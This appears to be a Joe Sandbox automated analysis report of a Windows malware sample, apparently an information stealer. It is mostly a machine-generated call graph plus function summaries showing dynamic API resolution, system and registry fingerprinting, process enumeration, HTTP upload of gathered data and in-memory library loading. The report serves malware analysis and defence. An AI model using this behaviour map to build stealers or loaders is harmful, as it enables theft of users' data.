b0a9b0 4 API calls 14991->14992 14993 b02247 14992->14993 14994 b0a8a0 lstrcpy 14993->14994 14995 b02250 14994->14995 14996 b0a9b0 4 API calls 14995->14996 14997 b02270 14996->14997 14998 b0a8a0 lstrcpy 14997->14998 14999 b02279 14998->14999 15580 b08100 GetProcessHeap RtlAllocateHeap 14999->15580 15002 b0a9b0 4 API calls 15003 b02299 15002->15003 15004 b0a8a0 lstrcpy 15003->15004 15005 b022a2 15004->15005 15006 b0a9b0 4 API calls 15005->15006 15007 b022c1 15006->15007 15008 b0a8a0 lstrcpy 15007->15008 15009 b022ca 15008->15009 15010 b0a9b0 4 API calls 15009->15010 15011 b022eb 15010->15011 15012 b0a8a0 lstrcpy 15011->15012 15013 b022f4 15012->15013 15586 b087c0 15013->15586 15016 b0a920 3 API calls 15017 b0231e 15016->15017 15018 b0a8a0 lstrcpy 15017->15018 15019 b02327 15018->15019 15020 b0a9b0 4 API calls 15019->15020 15021 b02351 15020->15021 15022 b0a8a0 lstrcpy 15021->15022 15023 b0235a 15022->15023 15024 b0a9b0 4 API calls 15023->15024 15025 b0237a 15024->15025 15026 b0a8a0 lstrcpy 15025->15026 15027 b02383 15026->15027 15028 b0a9b0 4 API calls 15027->15028 15029 b023a2 15028->15029 15030 b0a8a0 lstrcpy 15029->15030 15031 b023ab 15030->15031 15591 b081f0 15031->15591 15033 b023c2 15034 b0a920 3 API calls 15033->15034 15035 b023d5 15034->15035 15036 b0a8a0 lstrcpy 15035->15036 15037 b023de 15036->15037 15038 b0a9b0 4 API calls 15037->15038 15039 b0240a 15038->15039 15040 b0a8a0 lstrcpy 15039->15040 15041 b02413 15040->15041 15042 b0a9b0 4 API calls 15041->15042 15043 b02432 15042->15043 15044 b0a8a0 lstrcpy 15043->15044 15045 b0243b 15044->15045 15046 b0a9b0 4 API calls 15045->15046 15047 b0245c 15046->15047 15048 b0a8a0 lstrcpy 15047->15048 15049 b02465 15048->15049 15050 b0a9b0 4 API calls 15049->15050 15051 b02484 15050->15051 15052 b0a8a0 lstrcpy 15051->15052 15053 b0248d 15052->15053 15054 b0a9b0 4 API calls 15053->15054 15055 b024ae 15054->15055 15056 b0a8a0 lstrcpy 15055->15056 15057 b024b7 15056->15057 15599 b08320 15057->15599 15059 b024d3 15060 b0a920 3 API calls 15059->15060 15061 b024e6 15060->15061 15062 b0a8a0 lstrcpy 15061->15062 15063 b024ef 15062->15063 15064 b0a9b0 4 API calls 15063->15064 15065 b02519 15064->15065 15066 b0a8a0 lstrcpy 15065->15066 15067 b02522 15066->15067 15068 b0a9b0 4 API calls 15067->15068 15069 b02543 15068->15069 15070 b0a8a0 lstrcpy 15069->15070 15071 b0254c 15070->15071 15072 b08320 17 API calls 15071->15072 15073 b02568 15072->15073 15074 b0a920 3 API calls 15073->15074 15075 b0257b 15074->15075 15076 b0a8a0 lstrcpy 15075->15076 15077 b02584 15076->15077 15078 b0a9b0 4 API calls 15077->15078 15079 b025ae 15078->15079 15080 b0a8a0 lstrcpy 15079->15080 15081 b025b7 15080->15081 15082 b0a9b0 4 API calls 15081->15082 15083 b025d6 15082->15083 15084 b0a8a0 lstrcpy 15083->15084 15085 b025df 15084->15085 15086 b0a9b0 4 API calls 15085->15086 15087 b02600 15086->15087 15088 b0a8a0 lstrcpy 15087->15088 15089 b02609 15088->15089 15635 b08680 15089->15635 15091 b02620 15092 b0a920 3 API calls 15091->15092 15093 b02633 15092->15093 15094 b0a8a0 lstrcpy 15093->15094 15095 b0263c 15094->15095 15096 b0265a lstrlen 15095->15096 15097 b0266a 15096->15097 15098 b0a740 lstrcpy 15097->15098 15099 b0267c 15098->15099 15100 af1590 lstrcpy 15099->15100 15101 b0268d 15100->15101 15645 b05190 15101->15645 15103 b02699 15103->13535 15833 b0aad0 15104->15833 15106 af5009 InternetOpenUrlA 15110 af5021 15106->15110 15107 af502a InternetReadFile 15107->15110 15108 af50a0 InternetCloseHandle InternetCloseHandle 15109 af50ec 15108->15109 15109->13539 15110->15107 15110->15108 15834 af98d0 15111->15834 15113 b00759 15114 b00a38 15113->15114 15115 b0077d 15113->15115 15116 af1590 lstrcpy 15114->15116 15117 b00799 StrCmpCA 15115->15117 15118 b00a49 15116->15118 15119 b007a8 15117->15119 15148 b00843 15117->15148 16010 b00250 15118->16010 15121 b0a7a0 lstrcpy 15119->15121 15122 b007c3 15121->15122 15125 af1590 lstrcpy 15122->15125 15123 b00865 StrCmpCA 15124 b00874 15123->15124 15129 b0096b 15123->15129 15127 b0a740 lstrcpy 15124->15127 15128 b0080c 15125->15128 15131 b00881 15127->15131 15132 b0a7a0 lstrcpy 15128->15132 15130 b0099c StrCmpCA 15129->15130 15133 b00a2d 15130->15133 15134 b009ab 15130->15134 15135 b0a9b0 4 API calls 15131->15135 15136 b00823 15132->15136 15133->13543 15137 af1590 lstrcpy 15134->15137 15138 b008ac 15135->15138 15139 b0a7a0 lstrcpy 15136->15139 15140 b009f4 15137->15140 15141 b0a920 3 API calls 15138->15141 15142 b0083e 15139->15142 15143 b0a7a0 lstrcpy 15140->15143 15144 b008b3 15141->15144 15837 affb00 15142->15837 15146 b00a0d 15143->15146 15147 b0a9b0 4 API calls 15144->15147 15149 b0a7a0 lstrcpy 15146->15149 15150 b008ba 15147->15150 15148->15123 15151 b00a28 15149->15151 15485 b0a7a0 lstrcpy 15484->15485 15486 af1683 15485->15486 15487 b0a7a0 lstrcpy 15486->15487 15488 af1695 15487->15488 15489 b0a7a0 lstrcpy 15488->15489 15490 af16a7 15489->15490 15491 b0a7a0 lstrcpy 15490->15491 15492 af15a3 15491->15492 15492->14366 15494 af47c6 15493->15494 15495 af4838 lstrlen 15494->15495 15519 b0aad0 15495->15519 15497 af4848 InternetCrackUrlA 15498 af4867 15497->15498 15498->14443 15500 b0a740 lstrcpy 15499->15500 15501 b08b74 15500->15501 15502 b0a740 lstrcpy 15501->15502 15503 b08b82 GetSystemTime 15502->15503 15504 b08b99 15503->15504 15505 b0a7a0 lstrcpy 15504->15505 15506 b08bfc 15505->15506 15506->14458 15508 b0a931 15507->15508 15509 b0a988 15508->15509 15511 b0a968 lstrcpy lstrcat 15508->15511 15510 b0a7a0 lstrcpy 15509->15510 15512 b0a994 15510->15512 15511->15509 15512->14461 15513->14576 15515 af4eee 15514->15515 15516 af9af9 LocalAlloc 15514->15516 15515->14464 15515->14466 15516->15515 15517 af9b14 CryptStringToBinaryA 15516->15517 15517->15515 15518 af9b39 LocalFree 15517->15518 15518->15515 15519->15497 15520->14586 15521->14727 15522->14729 15523->14737 15652 b077a0 15524->15652 15527 b076c6 RegOpenKeyExA 15529 b07704 RegCloseKey 15527->15529 15530 b076e7 RegQueryValueExA 15527->15530 15528 b01c1e 15528->14819 15529->15528 15530->15529 15532 b01c99 15531->15532 15532->14833 15534 b01e09 15533->15534 15534->14875 15536 b07a9a wsprintfA 15535->15536 15537 b01e84 15535->15537 15536->15537 15537->14889 15539 b01efe 15538->15539 15540 b07b4d 15538->15540 15539->14903 15659 b08d20 LocalAlloc CharToOemW 15540->15659 15543 b0a740 lstrcpy 15542->15543 15544 b07bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15543->15544 15552 b07c25 15544->15552 15545 b07c46 GetLocaleInfoA 15545->15552 15546 b07d18 15547 b07d28 15546->15547 15548 b07d1e LocalFree 15546->15548 15549 b0a7a0 lstrcpy 15547->15549 15548->15547 15553 b07d37 15549->15553 15550 b0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15550->15552 15551 b0a8a0 lstrcpy 15551->15552 15552->15545 15552->15546 15552->15550 15552->15551 15553->14916 15555 b02008 15554->15555 15555->14931 15557 b09493 GetModuleFileNameExA CloseHandle 15556->15557 15558 b094b5 15556->15558 15557->15558 15559 b0a740 lstrcpy 15558->15559 15560 b02091 15559->15560 15560->14946 15562 b02119 15561->15562 15563 b07e68 RegQueryValueExA 15561->15563 15562->14960 15564 b07e8e RegCloseKey 15563->15564 15564->15562 15566 b07fb9 GetLogicalProcessorInformationEx 15565->15566 15567 b07fd8 GetLastError 15566->15567 15568 b08029 15566->15568 15572 b08022 15567->15572 15577 b07fe3 15567->15577 15573 b089f0 2 API calls 15568->15573 15571 b02194 15571->14974 15572->15571 15574 b089f0 2 API calls 15572->15574 15575 b0807b 15573->15575 15574->15571 15575->15572 15576 b08084 wsprintfA 15575->15576 15576->15571 15577->15566 15577->15571 15660 b089f0 15577->15660 15663 b08a10 GetProcessHeap RtlAllocateHeap 15577->15663 15579 b0220f 15578->15579 15579->14988 15581 b089b0 15580->15581 15582 b0814d GlobalMemoryStatusEx 15581->15582 15585 b08163 15582->15585 15583 b0819b wsprintfA 15584 b02289 15583->15584 15584->15002 15585->15583 15587 b087fb GetProcessHeap RtlAllocateHeap wsprintfA 15586->15587 15589 b0a740 lstrcpy 15587->15589 15590 b0230b 15589->15590 15590->15016 15592 b0a740 lstrcpy 15591->15592 15596 b08229 15592->15596 15593 b08263 15595 b0a7a0 lstrcpy 15593->15595 15594 b0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15594->15596 15597 b082dc 15595->15597 15596->15593 15596->15594 15598 b0a8a0 lstrcpy 15596->15598 15597->15033 15598->15596 15600 b0a740 lstrcpy 15599->15600 15601 b0835c RegOpenKeyExA 15600->15601 15602 b083d0 15601->15602 15603 b083ae 15601->15603 15605 b08613 RegCloseKey 15602->15605 15606 b083f8 RegEnumKeyExA 15602->15606 15604 b0a7a0 lstrcpy 15603->15604 15615 b083bd 15604->15615 15607 b0a7a0 lstrcpy 15605->15607 15608 b0860e 15606->15608 15609 b0843f wsprintfA RegOpenKeyExA 15606->15609 15607->15615 15608->15605 15610 b084c1 RegQueryValueExA 15609->15610 15611 b08485 RegCloseKey RegCloseKey 15609->15611 15613 b08601 RegCloseKey 15610->15613 15614 b084fa lstrlen 15610->15614 15612 b0a7a0 lstrcpy 15611->15612 15612->15615 15613->15608 15614->15613 15616 b08510 15614->15616 15615->15059 15617 b0a9b0 4 API calls 15616->15617 15618 b08527 15617->15618 15619 b0a8a0 lstrcpy 15618->15619 15620 b08533 15619->15620 15621 b0a9b0 4 API calls 15620->15621 15622 b08557 15621->15622 15623 b0a8a0 lstrcpy 15622->15623 15624 b08563 15623->15624 15625 b0856e RegQueryValueExA 15624->15625 15625->15613 15626 b085a3 15625->15626 15627 b0a9b0 4 API calls 15626->15627 15628 b085ba 15627->15628 15629 b0a8a0 lstrcpy 15628->15629 15630 b085c6 15629->15630 15631 b0a9b0 4 API calls 15630->15631 15632 b085ea 15631->15632 15633 b0a8a0 lstrcpy 15632->15633 15634 b085f6 15633->15634 15634->15613 15636 b0a740 lstrcpy 15635->15636 15637 b086bc CreateToolhelp32Snapshot Process32First 15636->15637 15638 b086e8 Process32Next 15637->15638 15639 b0875d CloseHandle 15637->15639 15638->15639 15644 b086fd 15638->15644 15640 b0a7a0 lstrcpy 15639->15640 15642 b08776 15640->15642 15641 b0a8a0 lstrcpy 15641->15644 15642->15091 15643 b0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15643->15644 15644->15638 15644->15641 15644->15643 15646 b0a7a0 lstrcpy 15645->15646 15647 b051b5 15646->15647 15648 af1590 lstrcpy 15647->15648 15649 b051c6 15648->15649 15664 af5100 15649->15664 15651 b051cf 15651->15103 15655 b07720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15652->15655 15654 b076b9 15654->15527 15654->15528 15656 b07780 RegCloseKey 15655->15656 15657 b07765 RegQueryValueExA 15655->15657 15658 b07793 15656->15658 15657->15656 15658->15654 15659->15539 15661 b089f9 GetProcessHeap HeapFree 15660->15661 15662 b08a0c 15660->15662 15661->15662 15662->15577 15663->15577 15665 b0a7a0 lstrcpy 15664->15665 15666 af5119 15665->15666 15667 af47b0 2 API calls 15666->15667 15668 af5125 15667->15668 15824 b08ea0 15668->15824 15670 af5184 15671 af5192 lstrlen 15670->15671 15672 af51a5 15671->15672 15673 b08ea0 4 API calls 15672->15673 15674 af51b6 15673->15674 15675 b0a740 lstrcpy 15674->15675 15676 af51c9 15675->15676 15677 b0a740 lstrcpy 15676->15677 15678 af51d6 15677->15678 15679 b0a740 lstrcpy 15678->15679 15680 af51e3 15679->15680 15681 b0a740 lstrcpy 15680->15681 15682 af51f0 15681->15682 15683 b0a740 lstrcpy 15682->15683 15684 af51fd InternetOpenA StrCmpCA 15683->15684 15685 af522f 15684->15685 15686 af58c4 InternetCloseHandle 15685->15686 15687 b08b60 3 API calls 15685->15687 15693 af58d9 ctype 15686->15693 15688 af524e 15687->15688 15689 b0a920 3 API calls 15688->15689 15690 af5261 15689->15690 15691 b0a8a0 lstrcpy 15690->15691 15692 af526a 15691->15692 15694 b0a9b0 4 API calls 15692->15694 15697 b0a7a0 lstrcpy 15693->15697 15695 af52ab 15694->15695 15696 b0a920 3 API calls 15695->15696 15698 af52b2 15696->15698 15705 af5913 15697->15705 15699 b0a9b0 4 API calls 15698->15699 15700 af52b9 15699->15700 15701 b0a8a0 lstrcpy 15700->15701 15702 af52c2 15701->15702 15703 b0a9b0 4 API calls 15702->15703 15704 af5303 15703->15704 15706 b0a920 3 API calls 15704->15706 15705->15651 15707 af530a 15706->15707 15708 b0a8a0 lstrcpy 15707->15708 15709 af5313 15708->15709 15710 af5329 InternetConnectA 15709->15710 15710->15686 15711 af5359 HttpOpenRequestA 15710->15711 15713 af58b7 InternetCloseHandle 15711->15713 15714 af53b7 15711->15714 15713->15686 15715 b0a9b0 4 API calls 15714->15715 15716 af53cb 15715->15716 15717 b0a8a0 lstrcpy 15716->15717 15718 af53d4 15717->15718 15719 b0a920 3 API calls 15718->15719 15720 af53f2 15719->15720 15721 b0a8a0 lstrcpy 15720->15721 15722 af53fb 15721->15722 15723 b0a9b0 4 API calls 15722->15723 15724 af541a 15723->15724 15725 b0a8a0 lstrcpy 15724->15725 15726 af5423 15725->15726 15727 b0a9b0 4 API calls 15726->15727 15728 af5444 15727->15728 15729 b0a8a0 lstrcpy 15728->15729 15730 af544d 15729->15730 15731 b0a9b0 4 API calls 15730->15731 15732 af546e 15731->15732 15733 b0a8a0 lstrcpy 15732->15733 15825 b08ead CryptBinaryToStringA 15824->15825 15827 b08ea9 15824->15827 15826 b08ece GetProcessHeap RtlAllocateHeap 15825->15826 15825->15827 15826->15827 15828 b08ef4 ctype 15826->15828 15827->15670 15829 b08f05 CryptBinaryToStringA 15828->15829 15829->15827 15833->15106 16076 af9880 15834->16076 15836 af98e1 15836->15113 15838 b0a740 lstrcpy 15837->15838 16011 b0a740 lstrcpy 16010->16011 16012 b00266 16011->16012 16013 b08de0 2 API calls 16012->16013 16014 b0027b 16013->16014 16015 b0a920 3 API calls 16014->16015 16016 b0028b 16015->16016 16017 b0a8a0 lstrcpy 16016->16017 16018 b00294 16017->16018 16019 b0a9b0 4 API calls 16018->16019 16020 b002b8 16019->16020 16077 af988d 16076->16077 16080 af6fb0 16077->16080 16079 af98ad ctype 16079->15836 16083 af6d40 16080->16083 16084 af6d63 16083->16084 16093 af6d59 16083->16093 16099 af6530 16084->16099 16088 af6dbe 16088->16093 16109 af69b0 16088->16109 16090 af6e2a 16091 af6ee6 VirtualFree 16090->16091 16090->16093 16094 af6ef7 16090->16094 16091->16094 16092 af6f41 16092->16093 16095 b089f0 2 API calls 16092->16095 16093->16079 16094->16092 16096 af6f38 16094->16096 16097 af6f26 FreeLibrary 16094->16097 16095->16093 16098 b089f0 2 API calls 16096->16098 16097->16094 16098->16092 16100 af6542 16099->16100 16102 af6549 16100->16102 16119 b08a10 GetProcessHeap RtlAllocateHeap 16100->16119 16102->16093 16103 af6660 16102->16103 16108 af668f VirtualAlloc 16103->16108 16105 af6730 16106 af673c 16105->16106 16107 af6743 VirtualAlloc 16105->16107 16106->16088 16107->16106 16108->16105 16108->16106 16110 af69c9 16109->16110 16114 af69d5 16109->16114 16111 af6a09 LoadLibraryA 16110->16111 16110->16114 16112 af6a32 16111->16112 16111->16114 16116 af6ae0 16112->16116 16120 b08a10 GetProcessHeap RtlAllocateHeap 16112->16120 16114->16090 16115 af6ba8 GetProcAddress 16115->16114 16115->16116 16116->16114 16116->16115 16117 b089f0 2 API calls 16117->16116 16118 af6a8b 16118->16114 16118->16117 16119->16102 16120->16118

                          Executed Functions

                          Function 00B09860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 b09860-b09874 call b09750 663 b09a93-b09af2 LoadLibraryA * 5 660->663 664 b0987a-b09a8e call b09780 GetProcAddress * 21 660->664 666 b09af4-b09b08 GetProcAddress 663->666 667 b09b0d-b09b14 663->667 664->663 666->667 669 b09b46-b09b4d 667->669 670 b09b16-b09b41 GetProcAddress * 2 667->670 671 b09b68-b09b6f 669->671 672 b09b4f-b09b63 GetProcAddress 669->672 670->669 673 b09b71-b09b84 GetProcAddress 671->673 674 b09b89-b09b90 671->674 672->671 673->674 675 b09bc1-b09bc2 674->675 676 b09b92-b09bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(76210000,018A1698), ref: 00B098A1
                          • GetProcAddress.KERNEL32(76210000,018A15F0), ref: 00B098BA
                          • GetProcAddress.KERNEL32(76210000,018A14E8), ref: 00B098D2
                          • GetProcAddress.KERNEL32(76210000,018A15D8), ref: 00B098EA
                          • GetProcAddress.KERNEL32(76210000,018A16B0), ref: 00B09903
                          • GetProcAddress.KERNEL32(76210000,018A8C38), ref: 00B0991B
                          • GetProcAddress.KERNEL32(76210000,01895048), ref: 00B09933
                          • GetProcAddress.KERNEL32(76210000,01895068), ref: 00B0994C
                          • GetProcAddress.KERNEL32(76210000,018A16C8), ref: 00B09964
                          • GetProcAddress.KERNEL32(76210000,018A1758), ref: 00B0997C
                          • GetProcAddress.KERNEL32(76210000,018A1650), ref: 00B09995
                          • GetProcAddress.KERNEL32(76210000,018A1608), ref: 00B099AD
                          • GetProcAddress.KERNEL32(76210000,01895248), ref: 00B099C5
                          • GetProcAddress.KERNEL32(76210000,018A15A8), ref: 00B099DE
                          • GetProcAddress.KERNEL32(76210000,018A1560), ref: 00B099F6
                          • GetProcAddress.KERNEL32(76210000,01895088), ref: 00B09A0E
                          • GetProcAddress.KERNEL32(76210000,018A1710), ref: 00B09A27
                          • GetProcAddress.KERNEL32(76210000,018A1578), ref: 00B09A3F
                          • GetProcAddress.KERNEL32(76210000,01894F68), ref: 00B09A57
                          • GetProcAddress.KERNEL32(76210000,018A1530), ref: 00B09A70
                          • GetProcAddress.KERNEL32(76210000,01895208), ref: 00B09A88
                          • LoadLibraryA.KERNEL32(018A1548,?,00B06A00), ref: 00B09A9A
                          • LoadLibraryA.KERNEL32(018A15C0,?,00B06A00), ref: 00B09AAB
                          • LoadLibraryA.KERNEL32(018A17A0,?,00B06A00), ref: 00B09ABD
                          • LoadLibraryA.KERNEL32(018A1620,?,00B06A00), ref: 00B09ACF
                          • LoadLibraryA.KERNEL32(018A1638,?,00B06A00), ref: 00B09AE0
                          • GetProcAddress.KERNEL32(75B30000,018A1668), ref: 00B09B02
                          • GetProcAddress.KERNEL32(751E0000,018A1728), ref: 00B09B23
                          • GetProcAddress.KERNEL32(751E0000,018A1680), ref: 00B09B3B
                          • GetProcAddress.KERNEL32(76910000,018A8DE8), ref: 00B09B5D
                          • GetProcAddress.KERNEL32(75670000,018952A8), ref: 00B09B7E
                          • GetProcAddress.KERNEL32(77310000,018A8BA8), ref: 00B09B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00B09BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00B09BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: b525d5dd9b035bbee8c7c650177b8296c98ffb163332f5263fef8e5b8f5258db
                          • Instruction ID: 8ae2ba77d36f321ef0679274d41a7e659e5f99ca65ab7006fca3a319692e3728
                          • Opcode Fuzzy Hash: b525d5dd9b035bbee8c7c650177b8296c98ffb163332f5263fef8e5b8f5258db
                          • Instruction Fuzzy Hash: C2A12AB6704340AFD344EFACED88A663BF9F75C301708851AA689C3364D779A841CB72
                          Function 00AF45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 af45c0-af4695 RtlAllocateHeap 781 af46a0-af46a6 764->781 782 af474f-af47a9 VirtualProtect 781->782 783 af46ac-af474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AF479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4734
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
